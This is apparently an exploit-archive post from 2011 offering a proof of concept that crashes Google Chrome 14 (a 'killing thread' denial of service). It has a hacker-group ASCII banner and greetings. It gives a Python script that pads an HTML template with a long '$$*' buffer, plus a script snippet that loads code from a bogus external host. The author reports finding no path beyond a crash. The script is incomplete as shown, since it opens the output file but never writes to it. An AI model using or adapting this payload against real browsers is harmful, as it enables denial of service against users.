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Google Chrome PoC, killing thread

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## _ (`-') _ pigtail23 (`-') (`-') _ _ remoteshell.de ##

## \-.(OO ) (_) .-> ( OO).-> (OO ).-/ (_) <-. ##

## _.' \ ,-(`-') ,---(`-')/ '._ / ,---. ,-(`-'),--. ) .----. .----. ##

##(_...--'' | ( OO)' .-(OO )|'--...__)| \ /`.\ | ( OO)| (`-')\_,-. |\_.-, | ##

##| |_.' | | | )| | .-, \`--. .--''-'|_.' | | | )| |OO ) .' .' |_ < ##

##| .___.'(| |_/ | | '.(_/ | | (| .-. |(| |_/(| '__ | .' /_ .-. \ | ##

##| | | |'->| '-' | | | | | | | | |'->| |'| |\ `-' / ##

##`--' `--' `-----' `--' `--' `--' `--' `-----' `------' `---'' ##



October 22, 2011

Ohh nice! What u doing google? Thx 4 ur bug! 0__o

Google Chrome PoC, killing thread. Exploitable or only a DOS!? Found no way to exploit it. Good Luck!!!

Testsystem: WinXP SP3, Win7(64 bit)

Google Chrome version: 14.0.835.202

Greetings to:

mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,...

TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net



too big!


Python script for debugging:


filename = 'poc.html'
content = open('template.html', 'r').read()

buff = '$$*' * 36800

rc = 484
content2 = content[:rc] + buff + content[rc:]

FILE = open(filename,"w")


<script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script>


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